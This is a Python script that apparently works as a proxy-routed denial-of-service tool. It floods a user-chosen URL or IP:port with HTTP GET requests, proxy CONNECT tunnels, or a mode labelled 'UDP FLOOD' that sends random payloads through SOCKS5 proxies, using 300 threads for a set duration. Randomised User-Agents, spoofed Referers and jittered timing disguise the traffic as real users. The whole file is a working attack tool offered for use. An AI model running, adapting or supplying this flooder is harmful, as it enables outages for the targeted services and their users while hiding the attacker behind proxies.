import requests
import concurrent.futures
import time
import os
import threading
import socket
import socks
import random # NEW: Import random library to increase randomness
# --- Configuration parameters ---
# Proxy file path used in HTTP/TCP mode
INPUT_HTTP_PROXY_FILE = 'working_proxies.txt'
# Proxy file path used in UDP mode for SOCKS5
INPUT_SOCKS5_PROXY_FILE = 'working_socks5_proxies.txt'
# Timeout for a single request (seconds)
TIMEOUT = 10
# Maximum number of concurrent threads (should be set high to achieve maximum traffic)
MAX_WORKERS = 300
# Random delay range for task submission (seconds). For example, 0.005 to 0.05 seconds to simulate irregular click intervals.
MIN_SUBMISSION_DELAY = 0.005
MAX_SUBMISSION_DELAY = 0.05
# ------------------
# Thread-safe counters
success_count = 0
fail_count = 0
lock = threading.Lock()
# Dynamically configured variables (set by user input at runtime)
TARGET_HOST = None
TARGET_PORT = None
TARGET_URL = None
ACCESS_MODE = None
RUN_DURATION_SECONDS = 0
# Common and real User-Agent list (to simulate different browsers)
USER_AGENTS = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5; rv:127.0) Gecko/20100101 Firefox/127.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1',
'Mozilla/5.0 (iPad; CPU OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1',
'Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36',
]
# Random Referer list (simulate request sources)
REFERERS = [
'https://www.google.com/',
'https://www.bing.com/',
'https://duckduckgo.com/',
'https://t.co/', # Simulate Twitter/X redirection
'https://www.facebook.com/',
'https://www.reddit.com/',
'https://www.zhihu.com/',
'https://t.cn/', # Simulate Weibo short link
'https://news.baidu.com/',
'http://localhost/', # Simulate internal link
'https://www.wikipedia.org/'
]
def load_proxies(file_path):
"""Load proxy list from file, return IP:PORT list"""
if not os.path.exists(file_path):
print(f"❌ Error: Proxy file not found: {file_path}")
return []
with open(file_path, 'r') as f:
proxies = [p.strip() for p in f.readlines() if p.strip()]
if not proxies:
print("❌ Error: No valid data in proxy file.")
return proxies
def visit_target(proxy, request_id):
"""Access target URL via specified proxy or directly"""
global success_count, fail_count, TARGET_URL, ACCESS_MODE, TIMEOUT, TARGET_HOST, TARGET_PORT
if not ACCESS_MODE:
with lock:
fail_count += 1
return
# --- Mode 1: HTTP GET request (using requests) ---
if ACCESS_MODE == 'HTTP_GET':
if not TARGET_URL:
with lock: fail_count += 1
return
try:
proxy_ip, proxy_port = proxy.split(':')
except ValueError:
proxy_ip, proxy_port = "Invalid", 0
proxies = {
'http': f'http://{proxy}',
'https': f'http://{proxy}',
}
# NEW: Randomize request headers
headers = {
'User-Agent': random.choice(USER_AGENTS), # Randomly select a User-Agent
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', # Simulate accepting Chinese/English
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Referer': random.choice(REFERERS) # NEW: Random Referer
}
try:
# Send request
response = requests.get(
TARGET_URL,
proxies=proxies,
timeout=TIMEOUT,
headers=headers, # Use randomized headers
verify=False # Disable SSL verification
)
# Check response status code
if response.status_code < 500:
with lock:
success_count += 1
else:
with lock:
success_count += 1
except requests.exceptions.RequestException:
with lock:
fail_count += 1
except Exception:
with lock:
fail_count += 1
# --- Mode 2: Raw TCP connection test (using socket) ---
elif ACCESS_MODE == 'TCP_CONNECT':
if not TARGET_HOST or not TARGET_PORT:
with lock: fail_count += 1
return
try:
proxy_ip, proxy_port = proxy.split(':')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(TIMEOUT)
# Attempt to connect to the proxy itself
s.connect((proxy_ip, int(proxy_port)))
# If connection is successful, attempt to send HTTP CONNECT request (establish tunnel)
# Although it's a TCP connection, we can still randomize User-Agent to prevent some proxies from checking
user_agent = random.choice(USER_AGENTS)
connect_request = f"CONNECT {TARGET_HOST}:{TARGET_PORT} HTTP/1.1\r\nHost: {TARGET_HOST}\r\nUser-Agent: {user_agent}\r\n\r\n"
s.sendall(connect_request.encode('utf-8'))
# Receive response
response = s.recv(4096).decode('utf-8')
s.close()
# Check if the proxy returns 200 Connection established
if "200 Connection established" in response:
with lock:
success_count += 1
else:
with lock:
fail_count += 1
except Exception:
with lock:
fail_count += 1
# --- Mode 3: UDP FLOOD (send via SOCKS5 proxy) ---
elif ACCESS_MODE == 'UDP_FLOOD':
if not TARGET_HOST or not TARGET_PORT:
with lock: fail_count += 1
return
try:
# 1. Split SOCKS5 proxy information
proxy_ip, proxy_port = proxy.split(':')
# 2. Create SOCKS proxy socket (using SOCK_DGRAM for UDP)
s = socks.socksocket(socket.AF_INET, socket.SOCK_DGRAM)
s.set_proxy(socks.SOCKS5, proxy_ip, int(proxy_port))
s.settimeout(TIMEOUT)
# Simple payload (1024 bytes)
payload = os.urandom(1024)
# 3. Send packet. socks.sendto will forward through the SOCKS5 proxy's UDP relay
s.sendto(payload, (TARGET_HOST, TARGET_PORT))
s.close()
with lock:
success_count += 1
except Exception:
with lock:
fail_count += 1
else:
# Mode error handling
print(f"Warning: Invalid ACCESS_MODE: {ACCESS_MODE}")
with lock:
fail_count += 1
def batch_visit(proxies):
"""Execute concurrent access tasks in batches, lasting for a specified duration"""
global ACCESS_MODE, success_count, fail_count, MAX_WORKERS, RUN_DURATION_SECONDS
run_duration_seconds = RUN_DURATION_SECONDS
start_time = time.time()
end_time = start_time + run_duration_seconds
total_requests_submitted = 0
if len(proxies) == 0:
print("No available proxies, unable to execute tasks. Program terminated.")
return
print(f"Starting continuous access task. Target duration: {run_duration_seconds / 60:.1f} minutes, Access mode: {ACCESS_MODE}, Concurrent count: {MAX_WORKERS}")
stop_monitoring = threading.Event()
def monitor_status():
"""Real-time monitoring of task status"""
while not stop_monitoring.is_set():
time.sleep(1) # Update every 1 second
completed_tasks = success_count + fail_count
elapsed_time = time.time() - start_time
rps = completed_tasks / elapsed_time if elapsed_time > 0 else 0
# Real-time progress output
progress_line = (
f"\r[Running] Duration: {elapsed_time:.1f}s / {run_duration_seconds}s | "
f"Submitted: {total_requests_submitted} | Success: {success_count} | Fail: {fail_count} | RPS: {rps:.2f} req/s"
)
print(progress_line, end="", flush=True)
monitor_thread = threading.Thread(target=monitor_status)
monitor_thread.start()
try:
with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
i = 0
num_proxies = len(proxies)
# Continuous submission loop
while time.time() < end_time:
# Loop through the proxy list
proxy_to_use = proxies[i % num_proxies]
# Submit task
executor.submit(visit_target, proxy_to_use, i + 1)
i += 1
total_requests_submitted = i
# NEW: Introduce random submission delay to simulate irregular user operations
sleep_time = random.uniform(MIN_SUBMISSION_DELAY, MAX_SUBMISSION_DELAY)
time.sleep(sleep_time)
# Task submission time ends
print(f"\n[Time's up] Task submission stopped. Submitted {total_requests_submitted} requests. Waiting for ongoing tasks to complete...")
finally:
# Ensure monitoring thread stops
stop_monitoring.set()
if monitor_thread.is_alive():
monitor_thread.join()
# 3. Result summary
end_time_final = time.time()
total_time = end_time_final - start_time
final_rps = (success_count + fail_count) / total_time if total_time > 0 else 0
print("\n--- Task Summary ---")
print(f"Total runtime: {total_time:.2f} seconds (including submission and cleanup periods)")
print(f"Total requests submitted: {total_requests_submitted}")
print(f"Successful accesses: {success_count}")
print(f"Failures: {fail_count}")
print(f"Average speed (RPS): {final_rps:.2f} requests/second")
if __name__ == '__main__':
# 1. Initialize proxy list and mode
working_proxies = []
# --- Interactive configuration ---
print("\n--- Access Mode Selection ---")
print("1. HTTP/HTTPS GET request (access web services via HTTP proxy)")
print("2. TCP CONNECT tunnel connection (connect IP:PORT via HTTP proxy)")
print("3. UDP FLOOD (connect IP:PORT via SOCKS5 proxy)")
mode_choice = input("Please select access mode (enter 1, 2, or 3): ").strip()
# Load different proxy files based on mode
if mode_choice == '1' or mode_choice == '2':
working_proxies = load_proxies(INPUT_HTTP_PROXY_FILE)
print(f"\nLoaded {len(working_proxies)} HTTP proxies.")
if not working_proxies:
print("HTTP/TCP mode requires a valid proxy list, but the list is empty. Program terminated.")
exit()
elif mode_choice == '3':
working_proxies = load_proxies(INPUT_SOCKS5_PROXY_FILE)
print(f"\nLoaded {len(working_proxies)} SOCKS5 proxies.")
if not working_proxies:
print("UDP_FLOOD mode requires a valid SOCKS5 proxy list, but the list is empty. Program terminated.")
exit()
else:
print("Invalid input, program terminated.")
exit()
# --- Set mode and target ---
if mode_choice == '1':
ACCESS_MODE = 'HTTP_GET'
TARGET_URL = input("Please enter target URL (e.g., http://httpbin.org/ip): ").strip() # Default target changed to httpbin
elif mode_choice == '2':
ACCESS_MODE = 'TCP_CONNECT'
target_input = input("Please enter target IP:PORT (e.g., 192.168.1.1:8080): ").strip()
try:
TARGET_HOST, TARGET_PORT = target_input.split(':')
TARGET_PORT = int(TARGET_PORT)
except ValueError:
print("Target format error. Please ensure the input format is IP:PORT. Program terminated.")
exit()
elif mode_choice == '3':
ACCESS_MODE = 'UDP_FLOOD'
target_input = input("Please enter target IP:PORT (e.g., 192.168.1.1:53): ").strip()
try:
TARGET_HOST, TARGET_PORT = target_input.split(':')
TARGET_PORT = int(TARGET_PORT)
except ValueError:
print("Target format error. Please ensure the input format is IP:PORT. Program terminated.")
exit()
# --- Set runtime ---
try:
duration_minutes = input("Please enter continuous access duration (minutes, e.g., 5): ").strip()
RUN_DURATION_SECONDS = int(duration_minutes) * 60
if RUN_DURATION_SECONDS <= 0:
print("Duration must be greater than 0, program terminated.")
exit()
except ValueError:
print("Invalid duration input, program terminated.")
exit()
print(f"Target: {TARGET_HOST}:{TARGET_PORT}" if ACCESS_MODE != 'HTTP_GET' else f"Target URL: {TARGET_URL}")
# 2. Batch concurrent access
batch_visit(working_proxies)